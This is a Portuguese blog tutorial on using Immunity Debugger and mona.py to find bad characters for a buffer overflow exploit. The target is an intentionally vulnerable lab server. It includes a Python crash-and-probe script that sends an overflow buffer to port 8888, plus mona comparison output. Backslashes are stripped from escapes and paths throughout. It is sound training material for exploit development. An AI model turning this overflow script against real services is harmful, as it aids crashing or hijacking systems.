Removendo bad chars usando Immunity Debugger e Mona

Até poucas semanas atrás eu não estava muito interessado em buffer overflows, sabia que é uma parte importante para a certificação da Offensive Security e que não haveria escapatória, mas ao ver os colegas removendo bad chars na mão eu já desanimava – eu não acredito que não há uma maneira mais fácil de fazer isso. E só ouvia Try Harder em resposta.

 

Mas o que são bad chars?

Bad characters (bad chars para os íntimos) são caracteres inválidos. Um programa pode usar algum caractere como delimitador, algum caractere pode ser filtrado e ignorado ou substituído por outro valor. Isso tornaria um payload usando esses caracteres inútil, portanto encontrar e remover bad chars é crucial.

 

Ingredientes

Para fazer essa brincadeira eu estou usando uma máquina virtual com Windows XP SP3, uma aplicação alvo foi desenvolvida pelo Hélvio Júnior intencionalmente com a falha a ser explorada e o manual do mona.py.

 

[+] Your bribe is insufficient.

Você veio aqui para remover esses caracteres inválidos do seu payload, então pau na jaca – com o Immunity Debugger aberto e o programa alvo devidamente anexado vamos começar configurando o ambiente:

!mona config -set workingfolder c:monalogs%p


Usamos este comando para definir a pasta onde os arquivos gerados pelo mona serão armazenados (o tio do pavê que habita em mim gosta de piadas fracas).

Podemos usar o comando abaixo para acalmar a paranóia e verificar que o comando acima funcionou:

!mona config -get workingfolder

Agora precisamos definir a base de comparação então:

!mona bytearray

Acabamos de gerar uma matriz com todos os caracteres de 00 a FF em dois arquivos, um .bin que o mona usará para comparação e um .txt de onde podemos copiar a lista de caracteres e usar em nosso exploit.

O conteúdo do arquivo .txt deve ser similar ao abaixo:

================================================================================
Output generated by mona.py v2.0, rev 583 - Immunity Debugger
Corelan Team - https://www.corelan.be
================================================================================
OS : xp, release 5.1.2600
Process being debugged : helvio_server (pid 1680)
Current mona arguments: bytearray
================================================================================
2018-12-07 22:30:23
================================================================================
"x00x01x02x03x04x05x06x07x08x09x0ax0bx0cx0dx0ex0fx10x11x12x13x14x15x16x17x18x19x1ax1bx1cx1dx1ex1f"
"x20x21x22x23x24x25x26x27x28x29x2ax2bx2cx2dx2ex2fx30x31x32x33x34x35x36x37x38x39x3ax3bx3cx3dx3ex3f"
"x40x41x42x43x44x45x46x47x48x49x4ax4bx4cx4dx4ex4fx50x51x52x53x54x55x56x57x58x59x5ax5bx5cx5dx5ex5f"
"x60x61x62x63x64x65x66x67x68x69x6ax6bx6cx6dx6ex6fx70x71x72x73x74x75x76x77x78x79x7ax7bx7cx7dx7ex7f"
"x80x81x82x83x84x85x86x87x88x89x8ax8bx8cx8dx8ex8fx90x91x92x93x94x95x96x97x98x99x9ax9bx9cx9dx9ex9f"
"xa0xa1xa2xa3xa4xa5xa6xa7xa8xa9xaaxabxacxadxaexafxb0xb1xb2xb3xb4xb5xb6xb7xb8xb9xbaxbbxbcxbdxbexbf"
"xc0xc1xc2xc3xc4xc5xc6xc7xc8xc9xcaxcbxccxcdxcexcfxd0xd1xd2xd3xd4xd5xd6xd7xd8xd9xdaxdbxdcxddxdexdf"
"xe0xe1xe2xe3xe4xe5xe6xe7xe8xe9xeaxebxecxedxeexefxf0xf1xf2xf3xf4xf5xf6xf7xf8xf9xfaxfbxfcxfdxfexff"

É importante lembrar que a string do exploit deve ser a mesma existente no arquivo .bin. Qualquer alteração na string do exploit deve refletir no arquivo .bin pois é este arquivo que o mona usará para efetuar a comparação. Também é importante lembrar caracteres que comumente são considerados inválidos (oi null byte?) e também algum outro que esteja sendo usado no exploit, no meu caso new line (n) e return carriage (r). Ou seja, antes de vermos o exploit falhar a primeira vez, já vamos gerar uma nova matriz de caracteres sem os indesejados usando o seguinte comando:

!mona bytearray -cpb "x00x0ax0d"

A pasta com os arquivos gerados foi atualizada…

… e o arquivo bytearray.txt agora tem uma matriz já com 3 bad chars removidos.

================================================================================
Output generated by mona.py v2.0, rev 583 - Immunity Debugger
Corelan Team - https://www.corelan.be
================================================================================
OS : xp, release 5.1.2600
Process being debugged : helvio_server (pid 464)
Current mona arguments: bytearray -cpb "x00x0ax0d"
================================================================================
2018-12-13 14:36:33
================================================================================
"x01x02x03x04x05x06x07x08x09x0bx0cx0ex0fx10x11x12x13x14x15x16x17x18x19x1ax1bx1cx1dx1ex1fx20x21x22"
"x23x24x25x26x27x28x29x2ax2bx2cx2dx2ex2fx30x31x32x33x34x35x36x37x38x39x3ax3bx3cx3dx3ex3fx40x41x42"
"x43x44x45x46x47x48x49x4ax4bx4cx4dx4ex4fx50x51x52x53x54x55x56x57x58x59x5ax5bx5cx5dx5ex5fx60x61x62"
"x63x64x65x66x67x68x69x6ax6bx6cx6dx6ex6fx70x71x72x73x74x75x76x77x78x79x7ax7bx7cx7dx7ex7fx80x81x82"
"x83x84x85x86x87x88x89x8ax8bx8cx8dx8ex8fx90x91x92x93x94x95x96x97x98x99x9ax9bx9cx9dx9ex9fxa0xa1xa2"
"xa3xa4xa5xa6xa7xa8xa9xaaxabxacxadxaexafxb0xb1xb2xb3xb4xb5xb6xb7xb8xb9xbaxbbxbcxbdxbexbfxc0xc1xc2"
"xc3xc4xc5xc6xc7xc8xc9xcaxcbxccxcdxcexcfxd0xd1xd2xd3xd4xd5xd6xd7xd8xd9xdaxdbxdcxddxdexdfxe0xe1xe2"
"xe3xe4xe5xe6xe7xe8xe9xeaxebxecxedxeexefxf0xf1xf2xf3xf4xf5xf6xf7xf8xf9xfaxfbxfcxfdxfexff"

Jogando essa string em nosso exploit e agora temos o seguinte código:

#!/usr/bin/python

import sys, socket

if len(sys.argv) < 2:
print "nUsage: " + sys.argv[0] + " n"
sys.exit()

bch = ("x01x02x03x04x05x06x07x08x09x0bx0cx0ex0fx10x11x12x13x14x15x16x17x18x19x1ax1bx1cx1dx1ex1f"
"x20x21x22x23x24x25x26x27x28x29x2ax2bx2cx2dx2ex2fx30x31x32x33x34x35x36x37x38x39x3ax3bx3cx3dx3ex3f"
"x40x41x42x43x44x45x46x47x48x49x4ax4bx4cx4dx4ex4fx50x51x52x53x54x55x56x57x58x59x5ax5bx5cx5dx5ex5f"
"x60x61x62x63x64x65x66x67x68x69x6ax6bx6cx6dx6ex6fx70x71x72x73x74x75x76x77x78x79x7ax7bx7cx7dx7ex7f"
"x80x81x82x83x84x85x86x87x88x89x8ax8bx8cx8dx8ex8fx90x91x92x93x94x95x96x97x98x99x9ax9bx9cx9dx9ex9f"
"xa0xa1xa2xa3xa4xa5xa6xa7xa8xa9xaaxabxacxadxaexafxb0xb1xb2xb3xb4xb5xb6xb7xb8xb9xbaxbbxbcxbdxbexbf"
"xc0xc1xc2xc3xc4xc5xc6xc7xc8xc9xcaxcbxccxcdxcexcfxd0xd1xd2xd3xd4xd5xd6xd7xd8xd9xdaxdbxdcxddxdexdf"
"xe0xe1xe2xe3xe4xe5xe6xe7xe8xe9xeaxebxecxedxeexefxf0xf1xf2xf3xf4xf5xf6xf7xf8xf9xfaxfbxfcxfdxfexff")

buffer = "A" * 452
buffer += "BBBB"
buffer += "x90" * 16
buffer += bch
buffer += "carcassss"

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((sys.argv[1], 8888))
print s.recv(1024)
print "Sending evil buffer..."
s.send(buffer)
s.close()

Vamos rodar e ver o que acontece.

 

ERROR_SUCCESS

Agora precisamos encontrar onde se iniciam os bad chars. Exatamente onde deixei selecionado, na linha em azul.
Podemos identificar o final do lixo jogado no buffer para causar o estouro da pilha, o espaço com "BBBB" que usaremos para o endereço do EIP, o NOP sled e então o conteúdo da nossa matriz de caracteres.
0022FB88 é o endereço que buscamos. Como esse dado em mãos, vamos finalmente fazer a comparação entre a matriz gerada (que está no arquivo .bin e também no exploit que enviamos) e que está em memória.

!mona compare -f C:monalogshelvio_serverbytearray.bin -a 0022FB88

Tá e daí? O que eu faça com tudo isso? Bem, vamos nos concentrar nas janelas mona Memory comparison results e Log data.
A primeira nos dá um resumo do que foi encontrado com uma lista de caracteres inválidos detectados.

Já o conteúdo da janela Log data é o mesmo que foi salvo no arquivo compare.txt que agora existe na pasta que definimos como nosso ambiente de trabalho.

| File        | Memory      | Note       
---------------------------------------------------------
0   0   4   4   | 01 02 03 04 | 01 02 03 04 | unmodified!
4   4   2   0   | 05 06       |             | missing    
6   4   24  24  | 07 ... 20   | 07 ... 20   | unmodified!
30  28  4   2   | 21 22 23 24 | c4 e3       | compacted  
34  30  159 159 | 25 ... c3   | 25 ... c3   | unmodified!
193 189 2   0   | c4 c5       |             | missing    
195 189 29  29  | c6 ... e2   | c6 ... e2   | unmodified!
224 218 2   0   | e3 e4       |             | missing    
226 218 27  27  | e5 ... ff   | e5 ... ff   | unmodified!
---------------------------------------------------------

Possibly bad chars: 05 06 21 22 23 24 c4 c5 e3 e4
Bytes omitted from input: 00 0a 0d

Se você estiver se sentindo com sorte, sua lista de caracteres inválidos já está pronta. Corre lá pro MSFVenom e abraço pro gaiteiro.
Senão, fica aqui que vamos fazer um refazer a comparação, para isso, mais uma vez vamos criar uma matriz agora removendo todos os caracteres detectados.
Nosso comando deve ser o seguinte:

!mona bytearray -cpb "x00x0ax0dx05x06x21x22x23x24xc4xc5xe3xe4"

Nossa matriz foi lá para o nosso exploit e já executamos ele mais uma vez.

Os bad chars já estão lá, o endereço é o mesmo, o comando vai ser o mesmo:

!mona compare -f C:monalogshelvio_serverbytearray.bin -a 0022FB88

E então é isso pessoal, o conteúdo da memória está sem modificações e confirmamos a lista de bad chars. Se você estiver procurando algum material (em português) para começar com o buffer overflow, o Hélvio também fez um vídeo com uma introdução ao assunto que recomendo fortemente.